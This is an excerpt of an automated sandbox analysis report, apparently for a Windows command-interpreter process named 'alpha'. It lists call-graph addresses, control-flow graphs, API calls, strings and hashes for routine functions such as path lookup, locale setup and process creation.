7ff7937473d4 168 API calls 19344->19353 19360 7ff7937644a8 19345->19360 19376 7ff793764549 19346->19376 19347 7ff793747315 19407 7ff7937473d4 19347->19407 19348->19336 19348->19344 19349 7ff793747348 168 API calls 19349->19335 19350 7ff793747348 168 API calls 19350->19347 19351 7ff7937472b0 168 API calls 19355 7ff79376480e 19351->19355 19369 7ff79376469a 19353->19369 19354 7ff7937645b2 19357 7ff793747348 168 API calls 19354->19357 19355->18889 19356 7ff793747323 19356->18889 19364 7ff7937645c7 19357->19364 19358 7ff793764654 19366 7ff793747348 168 API calls 19358->19366 19359->19336 19359->19358 19365 7ff7937644e2 19360->19365 19372 7ff793747348 168 API calls 19360->19372 19361 7ff79376455e 19361->19354 19370 7ff793747348 168 API calls 19361->19370 19362 7ff7937646e1 19363 7ff7937472b0 168 API calls 19362->19363 19368 7ff793764738 19363->19368 19371 7ff793747348 168 API calls 19364->19371 19373 7ff7937472b0 168 API calls 19365->19373 19366->19356 19367->19349 19374 7ff793747348 168 API calls 19368->19374 19369->19362 19381 7ff7937646c7 19369->19381 19382 7ff7937646ea 19369->19382 19370->19354 19375 7ff7937645db 19371->19375 19372->19365 19377 7ff7937644f1 19373->19377 19374->19390 19379 7ff793747348 168 API calls 19375->19379 19376->19354 19376->19361 19378 7ff793747348 168 API calls 19376->19378 19380 7ff7937472b0 168 API calls 19377->19380 19378->19361 19383 7ff7937645ec 19379->19383 19384 7ff793764503 19380->19384 19381->19362 19388 7ff793747348 168 API calls 19381->19388 19385 7ff793747348 168 API calls 19382->19385 19386 7ff793747348 168 API calls 19383->19386 19384->19356 19387 7ff793747348 168 API calls 19384->19387 19385->19362 19389 7ff793764600 19386->19389 19387->19390 19388->19362 19391 7ff793747348 168 API calls 19389->19391 19390->19351 19390->19356 19391->19390 19398 7ff79374735d 19392->19398 19393 7ff793743278 166 API calls 19394 7ff793764820 longjmp 19393->19394 19395 7ff793764838 19394->19395 19396 7ff793743278 166 API calls 19395->19396 19397 7ff793764844 longjmp 19396->19397 19399 7ff79376485a 19397->19399 19398->19393 19398->19395 19406 7ff7937473ab 19398->19406 19400 7ff793747348 166 API calls 19399->19400 19401 7ff79376487b 19400->19401 19402 7ff793747348 166 API calls 19401->19402 19403 7ff7937648ad 19402->19403 19404 7ff793747348 166 API calls 19403->19404 19405 7ff7937472ff 19404->19405 19405->19347 19405->19350 19408 7ff79376485a 19407->19408 19409 7ff793747401 19407->19409 19410 7ff793747348 168 API calls 19408->19410 19409->19356 19411 7ff79376487b 19410->19411 19412 7ff793747348 168 API calls 19411->19412 19413 7ff7937648ad 19412->19413 19414 7ff793747348 168 API calls 19413->19414 19415 7ff7937648be 19414->19415 19415->19356 16786 7ff793758d80 16787 7ff793758da4 16786->16787 16788 7ff793758db6 16787->16788 16789 7ff793758dbf Sleep 16787->16789 16790 7ff793758ddb _amsg_exit 16788->16790 16793 7ff793758de7 16788->16793 16789->16787 16790->16793 16791 7ff793758e56 _initterm 16795 7ff793758e73 _IsNonwritableInCurrentImage 16791->16795 16792 7ff793758e3c 16793->16791 16793->16792 16793->16795 16800 7ff7937537d8 GetCurrentThreadId OpenThread 16795->16800 16833 7ff7937504f4 16800->16833 16802 7ff793753839 HeapSetInformation RegOpenKeyExW 16803 7ff79375388d 16802->16803 16804 7ff79375e9f8 RegQueryValueExW RegCloseKey 16802->16804 16805 7ff793755920 VirtualQuery VirtualQuery 16803->16805 16807 7ff79375ea41 GetThreadLocale 16804->16807 16806 7ff7937538ab GetConsoleOutputCP GetCPInfo 16805->16806 16806->16807 16808 7ff7937538f1 memset 16806->16808 16810 7ff793753919 16807->16810 16808->16810 16809 7ff793754d5c 391 API calls 16809->16810 16810->16804 16810->16809 16811 7ff79375eb27 _setjmp 16810->16811 16812 7ff793753948 _setjmp 16810->16812 16813 7ff793768530 370 API calls 16810->16813 16814 7ff793743240 166 API calls 16810->16814 16815 7ff7937501b8 6 API calls 16810->16815 16816 7ff793754c1c 166 API calls 16810->16816 16817 7ff79374df60 481 API calls 16810->16817 16818 7ff79375eb71 _setmode 16810->16818 16819 7ff7937586f0 182 API calls 16810->16819 16820 7ff793750580 12 API calls 16810->16820 16823 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16823 16824 7ff79374be00 647 API calls 16810->16824 16825 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16825 16811->16810 16812->16810 16813->16810 16814->16810 16815->16810 16816->16810 16817->16810 16818->16810 16819->16810 16821 7ff79375398b GetConsoleOutputCP GetCPInfo 16820->16821 16822 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16821->16822 16822->16810 16823->16810 16824->16810 16826 7ff79375ebbe GetConsoleOutputCP GetCPInfo 16825->16826 16827 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16826->16827 16828 7ff79375ebe6 16827->16828 16829 7ff79374be00 647 API calls 16828->16829 16830 7ff793750580 12 API calls 16828->16830 16829->16828 16831 7ff79375ebfc GetConsoleOutputCP GetCPInfo 16830->16831 16832 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16831->16832 16832->16810 16834 7ff793750504 16833->16834 16835 7ff79375051e GetModuleHandleW 16834->16835 16836 7ff79375054d GetProcAddress 16834->16836 16837 7ff79375056c SetThreadLocale 16834->16837 16835->16834 16836->16834

                                                                                      Executed Functions

                                                                                      Function 00007FF793750A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                      • API String ID: 3305344409-4288247545
                                                                                      • Opcode ID: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction ID: 4407d8c19104c09594780358b436445b67f96e7267e9bee31977e3d803b385cd
                                                                                      • Opcode Fuzzy Hash: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction Fuzzy Hash: 5C42C521A0868285FFF8BB3198D42B9A7A8EF8D795F844136D91E677D4DF3CE5448320
                                                                                      Function 00007FF79374AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 216 7ff79374aa54-7ff79374aa98 call 7ff79374cd90 219 7ff79374aa9e 216->219 220 7ff79375bf5a-7ff79375bf70 call 7ff793754c1c call 7ff79374ff70 216->220 221 7ff79374aaa5-7ff79374aaa8 219->221 223 7ff79374acde-7ff79374ad00 221->223 224 7ff79374aaae-7ff79374aac8 wcschr 221->224 230 7ff79374ad06 223->230 224->223 227 7ff79374aace-7ff79374aae9 towlower 224->227 227->223 229 7ff79374aaef-7ff79374aaf3 227->229 233 7ff79375beb7-7ff79375bec4 call 7ff79376eaf0 229->233 234 7ff79374aaf9-7ff79374aafd 229->234 231 7ff79374ad0d-7ff79374ad1f 230->231 237 7ff79374ad22-7ff79374ad2a call 7ff7937513e0 231->237 246 7ff79375bf43-7ff79375bf59 call 7ff793754c1c 233->246 247 7ff79375bec6-7ff79375bed8 call 7ff793743240 233->247 235 7ff79374ab03-7ff79374ab07 234->235 236 7ff79375bbcf 234->236 239 7ff79374ab7d-7ff79374ab81 235->239 240 7ff79374ab09-7ff79374ab0d 235->240 249 7ff79375bbde 236->249 237->221 244 7ff79375be63 239->244 248 7ff79374ab87-7ff79374ab95 239->248 243 7ff79374ab13-7ff79374ab17 240->243 240->244 243->239 250 7ff79374ab19-7ff79374ab1d 243->250 255 7ff79375be72-7ff79375be88 call 7ff793743278 call 7ff793754c1c 244->255 246->220 247->246 263 7ff79375beda-7ff79375bee9 call 7ff793743240 247->263 253 7ff79374ab98-7ff79374aba0 248->253 259 7ff79375bbea-7ff79375bbec 249->259 250->249 254 7ff79374ab23-7ff79374ab27 250->254 253->253 258 7ff79374aba2-7ff79374abb3 call 7ff79374cd90 253->258 254->259 261 7ff79374ab2d-7ff79374ab31 254->261 283 7ff79375be89-7ff79375be8c 255->283 258->220 269 7ff79374abb9-7ff79374abde call 7ff7937513e0 call 7ff7937533a8 258->269 265 7ff79375bbf8-7ff79375bc01 259->265 261->230 266 7ff79374ab37-7ff79374ab3b 261->266 277 7ff79375beeb-7ff79375bef1 263->277 278 7ff79375bef3-7ff79375bef9 263->278 265->231 266->265 270 7ff79374ab41-7ff79374ab45 266->270 305 7ff79374abe4-7ff79374abe7 269->305 306 7ff79374ac75 269->306 274 7ff79374ab4b-7ff79374ab4f 270->274 275 7ff79375bc06-7ff79375bc2a call 7ff7937513e0 270->275 281 7ff79374ab55-7ff79374ab78 call 7ff7937513e0 274->281 282 7ff79374ad2f-7ff79374ad33 274->282 294 7ff79375bc2c-7ff79375bc4c _wcsnicmp 275->294 295 7ff79375bc5a-7ff79375bc61 275->295 277->246 277->278 278->246 284 7ff79375befb-7ff79375bf0d call 7ff793743240 278->284 281->221 288 7ff79374ad39-7ff79374ad3d 282->288 289 7ff79375bc66-7ff79375bc8a call 7ff7937513e0 282->289 291 7ff79374acbe 283->291 292 7ff79375be92-7ff79375beaa call 7ff793743278 call 7ff793754c1c 283->292 284->246 303 7ff79375bf0f-7ff79375bf21 call 7ff793743240 284->303 297 7ff79375bcde-7ff79375bd02 call 7ff7937513e0 288->297 298 7ff79374ad43-7ff79374ad49 288->298 324 7ff79375bc8c-7ff79375bcaa _wcsnicmp 289->324 325 7ff79375bcc4-7ff79375bcdc 289->325 301 7ff79374acc0-7ff79374acc7 291->301 337 7ff79375beab-7ff79375beb6 call 7ff793754c1c 292->337 294->295 304 7ff79375bc4e-7ff79375bc55 294->304 309 7ff79375bd31-7ff79375bd4f _wcsnicmp 295->309 328 7ff79375bd2a 297->328 329 7ff79375bd04-7ff79375bd24 _wcsnicmp 297->329 307 7ff79375bd5e-7ff79375bd65 298->307 308 7ff79374ad4f-7ff79374ad68 298->308 301->301 311 7ff79374acc9-7ff79374acda 301->311 303->246 339 7ff79375bf23-7ff79375bf35 call 7ff793743240 303->339 319 7ff79375bbb3-7ff79375bbb7 304->319 305->291 321 7ff79374abed-7ff79374ac0b call 7ff79374cd90 * 2 305->321 316 7ff79374ac77-7ff79374ac7f 306->316 307->308 320 7ff79375bd6b-7ff79375bd73 307->320 322 7ff79374ad6d-7ff79374ad70 308->322 323 7ff79374ad6a 308->323 317 7ff79375bd55 309->317 318 7ff79375bbc2-7ff79375bbca 309->318 311->223 316->291 335 7ff79374ac81-7ff79374ac85 316->335 317->307 318->221 330 7ff79375bbba-7ff79375bbbd call 7ff7937513e0 319->330 331 7ff79375be4a-7ff79375be5e 320->331 332 7ff79375bd79-7ff79375bd8b iswxdigit 320->332 321->337 356 7ff79374ac11-7ff79374ac14 321->356 322->237 323->322 324->325 336 7ff79375bcac-7ff79375bcbf 324->336 325->309 328->309 329->328 338 7ff79375bbac 329->338 330->318 331->330 332->331 342 7ff79375bd91-7ff79375bda3 iswxdigit 332->342 340 7ff79374ac88-7ff79374ac8f 335->340 336->319 337->233 338->319 339->246 357 7ff79375bf37-7ff79375bf3e call 7ff793743240 339->357 340->340 348 7ff79374ac91-7ff79374ac94 340->348 342->331 345 7ff79375bda9-7ff79375bdbb iswxdigit 342->345 345->331 352 7ff79375bdc1-7ff79375bdd7 iswdigit 345->352 348->291 351 7ff79374ac96-7ff79374acaa wcsrchr 348->351 351->291 358 7ff79374acac-7ff79374acb9 call 7ff793751300 351->358 354 7ff79375bdd9-7ff79375bddd 352->354 355 7ff79375bddf-7ff79375bdeb towlower 352->355 361 7ff79375bdee-7ff79375be0f iswdigit 354->361 355->361 356->337 362 7ff79374ac1a-7ff79374ac33 memset 356->362 357->246 358->291 363 7ff79375be17-7ff79375be23 towlower 361->363 364 7ff79375be11-7ff79375be15 361->364 362->306 365 7ff79374ac35-7ff79374ac4b wcschr 362->365 366 7ff79375be26-7ff79375be45 call 7ff7937513e0 363->366 364->366 365->306 367 7ff79374ac4d-7ff79374ac54 365->367 366->331 368 7ff79374ac5a-7ff79374ac6f wcschr 367->368 369 7ff79374ad72-7ff79374ad91 wcschr 367->369 368->306 368->369 371 7ff79374ad97-7ff79374adac wcschr 369->371 372 7ff79374af03-7ff79374af07 369->372 371->372 373 7ff79374adb2-7ff79374adc7 wcschr 371->373 372->306 373->372 374 7ff79374adcd-7ff79374ade2 wcschr 373->374 374->372 375 7ff79374ade8-7ff79374adfd wcschr 374->375 375->372 376 7ff79374ae03-7ff79374ae18 wcschr 375->376 376->372 377 7ff79374ae1e-7ff79374ae21 376->377 378 7ff79374ae24-7ff79374ae27 377->378 378->372 379 7ff79374ae2d-7ff79374ae40 iswspace 378->379 380 7ff79374ae4b-7ff79374ae5e 379->380 381 7ff79374ae42-7ff79374ae49 379->381 382 7ff79374ae66-7ff79374ae6d 380->382 381->378 382->382 383 7ff79374ae6f-7ff79374ae77 382->383 383->255 384 7ff79374ae7d-7ff79374ae97 call 7ff7937513e0 383->384 387 7ff79374ae9a-7ff79374aea4 384->387 388 7ff79374aebc-7ff79374aef8 call 7ff793750a6c call 7ff79374ff70 * 2 387->388 389 7ff79374aea6-7ff79374aead 387->389 388->316 397 7ff79374aefe 388->397 389->388 390 7ff79374aeaf-7ff79374aeba 389->390 390->387 390->388 397->283
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                      • String ID: :$:$:$:ON$OFF
                                                                                      • API String ID: 972821348-467788257
                                                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction ID: 5baea29ec09c63552ddf53e1c55b9fdae56214dad418049467c2a7cb0a0fd6f3
                                                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction Fuzzy Hash: A3229321A0864286FBF8BF3594D4279E6DAEF5DB81FC88136C90E67394DE3CB5408671
                                                                                      Function 00007FF7937551EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 398 7ff7937551ec-7ff793755248 call 7ff793755508 GetLocaleInfoW 401 7ff79375524e-7ff793755272 GetLocaleInfoW 398->401 402 7ff79375ef32-7ff79375ef3c 398->402 404 7ff793755274-7ff79375527a 401->404 405 7ff793755295-7ff7937552b9 GetLocaleInfoW 401->405 403 7ff79375ef3f-7ff79375ef49 402->403 408 7ff79375ef4b-7ff79375ef52 403->408 409 7ff79375ef61-7ff79375ef6c 403->409 410 7ff7937554f7-7ff7937554f9 404->410 411 7ff793755280-7ff793755286 404->411 406 7ff7937552bb-7ff7937552c3 405->406 407 7ff7937552de-7ff793755305 GetLocaleInfoW 405->407 412 7ff7937552c9-7ff7937552d7 406->412 413 7ff79375ef75-7ff79375ef78 406->413 414 7ff793755307-7ff79375531b 407->414 415 7ff793755321-7ff793755343 GetLocaleInfoW 407->415 408->409 416 7ff79375ef54-7ff79375ef5f 408->416 409->413 410->402 411->410 417 7ff79375528c-7ff79375528f 411->417 412->407 420 7ff79375ef7a-7ff79375ef7d 413->420 421 7ff79375ef99-7ff79375efa3 413->421 414->415 418 7ff793755349-7ff79375536e GetLocaleInfoW 415->418 419 7ff79375efaf-7ff79375efb9 415->419 416->403 416->409 417->405 423 7ff793755374-7ff793755396 GetLocaleInfoW 418->423 424 7ff79375eff2-7ff79375effc 418->424 422 7ff79375efbc-7ff79375efc6 419->422 420->407 425 7ff79375ef83-7ff79375ef8d 420->425 421->419 426 7ff79375efde-7ff79375efe9 422->426 427 7ff79375efc8-7ff79375efcf 422->427 429 7ff79375539c-7ff7937553be GetLocaleInfoW 423->429 430 7ff79375f035-7ff79375f03f 423->430 428 7ff79375efff-7ff79375f009 424->428 425->421 426->424 427->426 431 7ff79375efd1-7ff79375efdc 427->431 432 7ff79375f00b-7ff79375f012 428->432 433 7ff79375f021-7ff79375f02c 428->433 434 7ff79375f078-7ff79375f082 429->434 435 7ff7937553c4-7ff7937553e6 GetLocaleInfoW 429->435 436 7ff79375f042-7ff79375f04c 430->436 431->422 431->426 432->433 438 7ff79375f014-7ff79375f01f 432->438 433->430 437 7ff79375f085-7ff79375f08f 434->437 439 7ff79375f0bb-7ff79375f0c5 435->439 440 7ff7937553ec-7ff79375540e GetLocaleInfoW 435->440 441 7ff79375f04e-7ff79375f055 436->441 442 7ff79375f064-7ff79375f06f 436->442 443 7ff79375f0a7-7ff79375f0b2 437->443 444 7ff79375f091-7ff79375f098 437->444 438->428 438->433 445 7ff79375f0c8-7ff79375f0d2 439->445 446 7ff79375f0fe-7ff79375f108 440->446 447 7ff793755414-7ff793755436 GetLocaleInfoW 440->447 441->442 448 7ff79375f057-7ff79375f062 441->448 442->434 443->439 444->443 449 7ff79375f09a-7ff79375f0a5 444->449 450 7ff79375f0ea-7ff79375f0f5 445->450 451 7ff79375f0d4-7ff79375f0db 445->451 454 7ff79375f10b-7ff79375f115 446->454 452 7ff79375543c-7ff79375545e GetLocaleInfoW 447->452 453 7ff79375f141-7ff79375f14b 447->453 448->436 448->442 449->437 449->443 450->446 451->450 456 7ff79375f0dd-7ff79375f0e8 451->456 457 7ff79375f184-7ff79375f18b 452->457 458 7ff793755464-7ff793755486 GetLocaleInfoW 452->458 455 7ff79375f14e-7ff79375f158 453->455 459 7ff79375f12d-7ff79375f138 454->459 460 7ff79375f117-7ff79375f11e 454->460 462 7ff79375f15a-7ff79375f161 455->462 463 7ff79375f170-7ff79375f17b 455->463 456->445 456->450 464 7ff79375f18e-7ff79375f198 457->464 465 7ff79375548c-7ff7937554ae GetLocaleInfoW 458->465 466 7ff79375f1c4-7ff79375f1ce 458->466 459->453 460->459 461 7ff79375f120-7ff79375f12b 460->461 461->454 461->459 462->463 468 7ff79375f163-7ff79375f16e 462->468 463->457 469 7ff79375f19a-7ff79375f1a1 464->469 470 7ff79375f1b0-7ff79375f1bb 464->470 471 7ff79375f207-7ff79375f20e 465->471 472 7ff7937554b4-7ff7937554f5 setlocale call 7ff793758f80 465->472 467 7ff79375f1d1-7ff79375f1db 466->467 473 7ff79375f1dd-7ff79375f1e4 467->473 474 7ff79375f1f3-7ff79375f1fe 467->474 468->455 468->463 469->470 476 7ff79375f1a3-7ff79375f1ae 469->476 470->466 475 7ff79375f211-7ff79375f21b 471->475 473->474 479 7ff79375f1e6-7ff79375f1f1 473->479 474->471 480 7ff79375f21d-7ff79375f224 475->480 481 7ff79375f233-7ff79375f23e 475->481 476->464 476->470 479->467 479->474 480->481 482 7ff79375f226-7ff79375f231 480->482 482->475 482->481
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                      • API String ID: 1351325837-2236139042
                                                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction ID: e0b5a3593ae4b09b2ad2ad2e652c9219d7e4c6ef6faf26e3d431666c5e2da33e
                                                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction Fuzzy Hash: 33F13B61B04742C5EBB5AF21D5902B9A2A8FF0CB91FD44536CA0E677A4EF3CE506C360
                                                                                      Function 00007FF793754224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 483 7ff793754224-7ff7937542a5 InitializeProcThreadAttributeList 484 7ff7937542ab-7ff7937542e5 UpdateProcThreadAttribute 483->484 485 7ff79375ecd4-7ff79375ecee GetLastError call 7ff793769eec 483->485 486 7ff7937542eb-7ff7937543c6 memset * 2 GetStartupInfoW call 7ff793753a90 call 7ff79374b900 484->486 487 7ff79375ecf0-7ff79375ed19 GetLastError call 7ff793769eec DeleteProcThreadAttributeList 484->487 492 7ff79375ed1e 485->492 497 7ff7937543cc-7ff7937543d3 486->497 498 7ff793754638-7ff793754644 _local_unwind 486->498 487->492 499 7ff793754649-7ff793754650 497->499 500 7ff7937543d9-7ff7937543dc 497->500 498->499 499->500 503 7ff793754656-7ff79375465d 499->503 501 7ff7937543de-7ff7937543f5 wcsrchr 500->501 502 7ff793754415-7ff793754424 call 7ff793755a68 500->502 501->502 504 7ff7937543f7-7ff79375440f lstrcmpW 501->504 509 7ff793754589-7ff793754590 502->509 510 7ff79375442a-7ff793754486 CreateProcessW 502->510 503->502 506 7ff793754663 503->506 504->502 508 7ff793754668-7ff79375466d call 7ff793769044 504->508 506->500 508->502 509->510 514 7ff793754596-7ff7937545fa CreateProcessAsUserW 509->514 512 7ff79375448b-7ff79375448f 510->512 515 7ff793754495-7ff7937544c7 CloseHandle call 7ff79375498c 512->515 516 7ff793754672-7ff793754682 GetLastError 512->516 514->512 519 7ff79375468d-7ff793754694 515->519 520 7ff7937544cd-7ff7937544e5 515->520 516->519 521 7ff793754696-7ff7937546a0 519->521 522 7ff7937546a2-7ff7937546ac 519->522 523 7ff7937544eb-7ff7937544f2 520->523 524 7ff7937547a3-7ff7937547a9 520->524 521->522 525 7ff7937546ae-7ff7937546b5 call 7ff7937597bc 521->525 522->525 526 7ff793754705-7ff793754707 522->526 528 7ff7937544f8-7ff793754507 523->528 529 7ff7937545ff-7ff793754607 523->529 541 7ff7937546b7-7ff793754701 call 7ff79379c038 525->541 542 7ff793754703 525->542 526->520 527 7ff79375470d-7ff79375472a call 7ff79374cd90 526->527 543 7ff79375472c-7ff793754738 _local_unwind 527->543 544 7ff79375473d-7ff793754767 call 7ff7937513e0 call 7ff793769eec call 7ff79374ff70 _local_unwind 527->544 532 7ff79375450d-7ff793754553 call 7ff793755cb4 call 7ff7937533f0 call 7ff79375498c 528->532 533 7ff793754612-7ff793754616 528->533 529->528 534 7ff79375460d 529->534 566 7ff793754558-7ff79375455e 532->566 539 7ff79375461c-7ff793754633 533->539 540 7ff7937547d7-7ff7937547df 533->540 538 7ff79375476c-7ff793754773 534->538 538->528 548 7ff793754779-7ff793754780 538->548 546 7ff7937547f2-7ff79375483c call 7ff79374ff70 DeleteProcThreadAttributeList call 7ff793758f80 539->546 545 7ff7937547e1-7ff7937547ed CloseHandle 540->545 540->546 541->526 542->526 543->544 544->538 545->546 548->528 553 7ff793754786-7ff793754789 548->553 553->528 558 7ff79375478f-7ff793754792 553->558 558->524 562 7ff793754794-7ff79375479d call 7ff79376a250 558->562 562->524 562->528 567 7ff7937547ae-7ff7937547ca call 7ff7937533f0 566->567 568 7ff793754564-7ff793754579 call 7ff79375498c 566->568 567->540 568->546 576 7ff79375457f-7ff793754584 call 7ff79376a920 568->576 576->546
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                      • API String ID: 388421343-2905461000
                                                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction ID: 36eef53106bbb2fae4f4d88116937c35fa51eaed6ff1f9c23c6529cd3fa427eb
                                                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction Fuzzy Hash: C5F13132A0D78295EAB4AB21E4C47BAF7A8FB8D741F804136D94D62754DF3CE445CB60
                                                                                      Function 00007FF793755554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
